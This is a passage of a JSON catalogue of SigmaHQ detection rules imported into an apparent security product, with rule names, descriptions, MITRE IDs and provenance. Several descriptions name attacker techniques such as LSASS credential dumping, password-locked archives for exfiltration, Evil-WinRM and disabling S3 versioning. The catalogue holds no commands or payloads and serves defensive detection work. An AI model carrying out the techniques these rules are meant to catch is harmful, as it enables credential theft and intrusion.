"9f50fe98-fe5c-4a2d-86c7-fad7f63ed622", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml" } }, { "id": "sigmahq-sigma-9f546b25-5f12-4c8d-8532-5893dcb1e4b8", "type": "detection", "name": "Potentially Suspicious Child Process Of DiskShadow.EXE", "description": "Detects potentially suspicious child processes of \"Diskshadow.exe\". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-child-process-of-diskshadow-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f546b25-5f12-4c8d-8532-5893dcb1e4b8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_diskshadow_child_process_susp.yml" } }, { "id": "sigmahq-sigma-9f5c1d59-33be-4e60-bcab-85d2f566effd", "type": "detection", "name": "Suspicious Process Access to LSASS with Dbgcore/Dbghelp DLLs", "description": "Detects suspicious process access to LSASS.exe from processes located in uncommon locations with dbgcore.dll or dbghelp.dll in the call trace.\nThese DLLs contain functions like MiniDumpWriteDump that can be abused for credential dumping purposes. While modern tools like Mimikatz have moved to using ntdll.dll,\ndbgcore.dll and dbghelp.dll are still used by basic credential dumping utilities and legacy tools for LSASS memory access and process suspension techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-access-to-lsass-with-dbgcore-dbghelp-dlls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f5c1d59-33be-4e60-bcab-85d2f566effd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load.yml" } }, { "id": "sigmahq-sigma-9f6a34b4-2688-4eb7-a7f5-e39fef573d0e", "type": "detection", "name": "Suspicious Windows Strings In URI", "description": "Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-windows-strings-in-uri.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f6a34b4-2688-4eb7-a7f5-e39fef573d0e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_susp_windows_path_uri.yml" } }, { "id": "sigmahq-sigma-9f8573c9-22b4-40e3-89c1-72bc2b8d49ab", "type": "detection", "name": "Scheduled Task Creation Masquerading as System Processes", "description": "Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1036.004", "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-task-creation-masquerading-as-system-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f8573c9-22b4-40e3-89c1-72bc2b8d49ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_system_process.yml" } }, { "id": "sigmahq-sigma-9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", "type": "detection", "name": "HackTool - SharpLDAPmonitor Execution", "description": "Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpldapmonitor-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml" } }, { "id": "sigmahq-sigma-9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", "type": "detection", "name": "Uncommon FileSystem Load Attempt By Format.com", "description": "Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which \"format.com\" is used to load malicious DLL files or other programs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-filesystem-load-attempt-by-format-com.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_format_uncommon_filesystem_load.yml" } }, { "id": "sigmahq-sigma-9fbf5927-5261-4284-a71d-f681029ea574", "type": "detection", "name": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/compress-data-and-lock-with-password-for-exfiltration-with-7-zip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9fbf5927-5261-4284-a71d-f681029ea574", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_7zip_password_compression.yml" } }, { "id": "sigmahq-sigma-9fc3072c-dc8f-4bf7-b231-18950000fadd", "type": "detection", "name": "Potential Recon Activity Using DriverQuery.EXE", "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-recon-activity-using-driverquery-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_driverquery_recon.yml" } }, { "id": "sigmahq-sigma-9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", "type": "detection", "name": "Usage Of Web Request Commands And Cmdlets", "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/usage-of-web-request-commands-and-cmdlets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" } }, { "id": "sigmahq-sigma-9fe55ea2-4cd6-4491-8a54-dd6871651b51", "type": "detection", "name": "HackTool - Evil-WinRm Execution - PowerShell Module", "description": "Detects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-evil-winrm-execution-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9fe55ea2-4cd6-4491-8a54-dd6871651b51", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_hktl_evil_winrm_execution.yml" } }, { "id": "sigmahq-sigma-9fff585c-c33e-4a86-b3cd-39312079a65f", "type": "detection", "name": "Taskmgr as LOCAL_SYSTEM", "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/taskmgr-as-local-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_taskmgr_localsystem.yml" } }, { "id": "sigmahq-sigma-a015e032-146d-4717-8944-7a1884122111", "type": "detection", "name": "Linux HackTool Execution", "description": "Detects known hacktool execution based on image name.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1587" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-hacktool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a015e032-146d-4717-8944-7a1884122111", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml" } }, { "id": "sigmahq-sigma-a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "type": "detection", "name": "Suspicious Execution From Outlook Temporary Folder", "description": "Detects a suspicious program execution in Outlook temp folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-from-outlook-temporary-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml" } }, { "id": "sigmahq-sigma-a01b8329-5953-4f73-ae2d-aa01e1f35f00", "type": "detection", "name": "AspNetCompiler Execution", "description": "Detects execution of \"aspnet_compiler.exe\" which can be abused to compile and execute C# code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aspnetcompiler-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml" } }, { "id": "sigmahq-sigma-a0413867-daf3-43dd-9245-734b3a787942", "type": "detection", "name": "Bitlocker Key Retrieval", "description": "Monitor and alert for Bitlocker key retrieval.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitlocker-key-retrieval.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a0413867-daf3-43dd-9245-734b3a787942", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_ad_bitlocker_key_retrieval.yml" } }, { "id": "sigmahq-sigma-a0459f02-ac51-4c09-b511-b8c9203fc429", "type": "detection", "name": "Potential Process Execution Proxy Via CL_Invocation.ps1", "description": "Detects calls to \"SyncInvoke\" that is part of the \"CL_Invocation.ps1\" script to proxy execution using \"System.Diagnostics.Process\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-process-execution-proxy-via-cl-invocation-ps1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a0459f02-ac51-4c09-b511-b8c9203fc429", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_cl_invocation.yml" } }, { "id": "sigmahq-sigma-a05baa88-e922-4001-bc4d-8738135f27de", "type": "detection", "name": "Process Monitor Driver Creation By Non-Sysinternals Binary", "description": "Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-monitor-driver-creation-by-non-sysinternals-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a05baa88-e922-4001-bc4d-8738135f27de", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml" } }, { "id": "sigmahq-sigma-a07f0359-4c90-4dc4-a681-8ffea40b4f47", "type": "detection", "name": "Service Binary in Suspicious Folder", "description": "Detect the creation of a service with a service binary located in a suspicious directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-binary-in-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml" } }, { "id": "sigmahq-sigma-a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", "type": "detection", "name": "LSASS Access Detected via Attack Surface Reduction", "description": "Detects Access to LSASS Process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-access-detected-via-attack-surface-reduction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_asr_lsass_access.yml" } }, { "id": "sigmahq-sigma-a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9", "type": "detection", "name": "Okta New Admin Console Behaviours", "description": "Detects when Okta identifies new activity in the Admin Console.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-new-admin-console-behaviours.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_new_behaviours_admin_console.yml" } }, { "id": "sigmahq-sigma-a0cb7110-edf0-47a4-9177-541a4083128a", "type": "detection", "name": "Vulnerable Netlogon Secure Channel Connection Allowed", "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vulnerable-netlogon-secure-channel-connection-allowed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a0cb7110-edf0-47a4-9177-541a4083128a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml" } }, { "id": "sigmahq-sigma-a0d7e4d2-bede-4141-8896-bc6e237e977c", "type": "detection", "name": "Suspicious File Download From File Sharing Domain Via Wget.EXE", "description": "Detects potentially suspicious file downloads from file sharing domains using wget.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-download-from-file-sharing-domain-via-wget-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a0d7e4d2-bede-4141-8896-bc6e237e977c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml" } }, { "id": "sigmahq-sigma-a0edd39f-a0c6-4c17-8141-261f958e8d8f", "type": "detection", "name": "PowerShell Remote Session Creation", "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-remote-session-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" } }, { "id": "sigmahq-sigma-a10a2c40-2c4d-49f8-b557-1a946bc55d9d", "type": "detection", "name": "Uncommon File Created In Office Startup Folder", "description": "Detects the creation of a file with an uncommon extension in an Office application startup folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1587.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-file-created-in-office-startup-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_uncommon_file_startup.yml" } }, { "id": "sigmahq-sigma-a136ac98-b2bc-4189-a14d-f0d0388e57a7", "type": "detection", "name": "AWS S3 Bucket Versioning Disable", "description": "Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-s3-bucket-versioning-disable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a136ac98-b2bc-4189-a14d-f0d0388e57a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_disable_bucket_versioning.yml" } }, { "id": "sigmahq-sigma-a136cde0-61ad-4a61-9b82-8dc490e60dd2", "type": "detection", "name": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-clip-launcher-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml" } }, { "id": "sigmahq-sigma-a1473adb-5338-4a20-b4c3-126763e2d3d3", "type": "detection", "name": "Suspicious Advpack Call Via Rundll32.EXE", "description": "Detects execution of \"rundll32\" calling \"advpack.dll\" with potential obfuscated ordinal calls in order to leverage the \"RegisterOCX\" function", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-advpack-call-via-rundll32-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a1473adb-5338-4a20-b4c3-126763e2d3d3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml" } }, { "id": "sigmahq-sigma-a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "type": "detection", "name": "Macro Enabled In A Potentially Suspicious Document", "description": "Detects registry changes to Office trust records where the path is located in a potentially suspicious location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/macro-enabled-in-a-potentially-suspicious-document.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_trust_record_susp_location.yml" } }, { "id": "sigmahq-sigma-a16980c2-0c56-4de0-9a79-17971979efdd", "type": "detection", "name": "Cmd.EXE Missing Space Characters Execution Anomaly", "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cmd-exe-missing-space-characters-execution-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a16980c2-0c56-4de0-9a79-17971979efdd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_no_space_execution.yml" } }, { "id": "sigmahq-sigma-a18dd26b-6450-46de-8c91-9659150cf088", "type": "detection", "name": "Potentially Suspicious GrantedAccess Flags On LSASS", "description": "Detects process access requests to LSASS process with potentially suspicious access flags", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-grantedaccess-flags-on-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a18dd26b-6450-46de-8c91-9659150cf088", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_susp_access_flag.yml" } }, { "id": "sigmahq-sigma-a18e0862-127b-43ca-be12-1a542c75c7c5", "type": "detection", "name": "LSASS Process Crashed - Application", "description": "Detects Windows error reporting events where the process that crashed is 